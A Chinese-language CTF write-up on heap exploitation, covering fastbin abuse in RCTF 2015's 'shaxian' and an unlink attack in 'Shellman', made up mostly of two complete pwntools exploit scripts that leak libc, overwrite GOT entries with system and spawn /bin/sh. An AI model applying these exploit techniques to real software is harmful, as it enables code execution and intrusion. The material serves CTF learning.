深入解析CTF中的PWN挑战：Fastbin与堆溢出

在本次分析中，我们将聚焦于2015年RCTF竞赛中的一道PWN题目——shaxian，探讨其关键点在于堆溢出技术的应用。首先，我们来看一下该题目的大致代码流程。


从代码中可以看出，该题目主要依赖于Fastbin机制进行漏洞利用。由于分配堆之后直接进行写操作，因此使用了fastbin来实现任意读写功能。具体来说，通过覆盖now指针可以达到这一目的。

以下是针对此题目的EXP示例代码：

```python
from pwn import *

DEBUG = 1
LOCAL = 1
VERBOSE = 1
atoi_got = 0x804b038

if LOCAL:
r = process('shaxian')
else:
r = remote('127.0.0.1', 1001)

if DEBUG:
gdb.attach(r)

if VERBOSE:
context(log_level='debug')

def dcai(payload, number=0):
r.sendline('1')
r.recvuntil('Jianjiao')
r.sendline(payload)
r.recvuntil('How many?')
r.sendline(str(number))
r.recvuntil('choose:')

def submit():
r.sendline('2')
r.recvuntil('Your order has been submitted!')
r.recvuntil('choose:')

r.recvuntil('Address:')
r.sendline(p32(0) + p32(0x31))
r.recvuntil('Your Phone number:')
r.sendline('a' * 0xf0 + p32(0) + p32(0x31))
r.recvuntil('choose:')

payload = 'B' * 24 + p32(0) + p32(0x31) + p32(0x804b02c) # puts
dcai(payload)
r.sendline('4')
r.recvuntil('* ')
r.recvuntil('* ')
puts = int(r.recvuntil('\n').strip('\n')) & 0xffffffff

libc = puts - 0x657e0
print 'libc:', hex(libc)
system = libc + 0x40310
print 'system:', hex(system)
low8_system = (system <<8) % pow(2, 32)
payload = 'C' * 24 + p32(0) + p32(0x31) + p32(0x804b1b8)
dcai(payload)
raw_input('before')
submit()
raw_input('after')
payload = 'a' * 4 + p32(atoi_got - 1)
dcai(payload, low8_system)

r.sendline('/bin/sh')
r.interactive()
r.sendline('ls')
r.recv()
```

接下来，我们通过另一个PWN题目Shellman来进一步理解bins溢出的利用方法。这个题目与前文提到的freenote非常相似，但更加简化。以下是针对Shellman的EXP示例代码：

```python
from pwn import *

DEBUG = 0
LOCAL = 1
VERBOSE = 1

if LOCAL:
p = process('./shellman')
else:
p = remote('127.0.0.1', 6666)

if DEBUG:
gdb.attach(p)

if VERBOSE:
context(log_level='debug')

p.recvuntil('>')

def list_():
p.sendline('1')
k = p.recvuntil('>')
return k

def new(payload):
p.sendline('2')
p.recvuntil('Length of new shellcode:')
p.sendline(str(len(payload)))
p.recvuntil('Enter your shellcode(in raw format):')
p.send(payload)
p.recvuntil('>')

def edit(payload, num=0):
p.sendline('3')
p.recvuntil('Shellcode number:')
p.sendline(str(num))
p.recvuntil('Length of shellcode:')
p.sendline(str(len(payload)))
p.recvuntil('Enter your shellcode:')
p.send(payload)
p.recvuntil('>')

def delete(num=0):
p.sendline('4')
p.recvuntil('Shellcode number:')
p.sendline(str(num))
p.sendline(str(num))

first_size = 0x30
second_size = 0xa0

new('a' * first_size) # at 0x0079e010
new('b' * second_size) # at 0x0079e050
new('/bin/sh;')

PREV_IN_USE = 0x1
prev_size_0 = p64(0)
size_0 = p64(first_size | PREV_IN_USE)
fd_0 = p64(0x006016d0 - 0x18) # bk offset
bk_0 = p64(0x006016d0 - 0x10) # fd offset
user_data = 'm' * (first_size - 0x20) # 0x20 = chunk header size
prev_size_1 = p64(first_size)
size_1 = p64((second_size + 0x10) & (~PREV_IN_USE)) # make first chunk free

edit(prev_size_0 + size_0 + fd_0 + bk_0 + user_data + prev_size_1 + size_1)
# begin
delete(1)
# after unlink then *0x6016d0 == 0x6016b8, let's corrupt 0x6016d0 with libc_free_got
rubbish = 'whatthis'
is_shellcode_exist = p64(0x1)
shellcode_size = p64(0x8)
libc_free_got = p64(0x00601600)

edit(rubbish + is_shellcode_exist + shellcode_size + libc_free_got)
free_address = list_().split(': ')[1][0:16]

free_address = int(''.join(free_address[i:i+2] for i in range(14, -2, -2)), 16)
print 'free_address:', hex(free_address)
libc = free_address - 0x82d00
print 'libc_address:', hex(libc)
system = libc + 0x46590
print 'system_address:', hex(system)
edit(p64(system))
# just free
delete(2)
p.interactive()
```

通过上述代码示例，我们可以更深入地理解PWN题目的解题思路和技术细节。希望这些内容能够帮助读者更好地掌握PWN挑战的核心技巧。